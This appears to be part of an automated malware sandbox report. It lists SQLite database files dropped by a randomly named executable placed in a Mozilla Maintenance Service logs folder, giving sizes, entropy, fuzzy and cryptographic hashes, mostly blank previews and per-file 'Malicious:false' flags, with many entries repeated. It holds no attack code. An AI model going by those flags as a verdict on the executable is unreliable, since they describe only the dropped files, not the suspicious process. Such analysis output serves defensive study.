                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
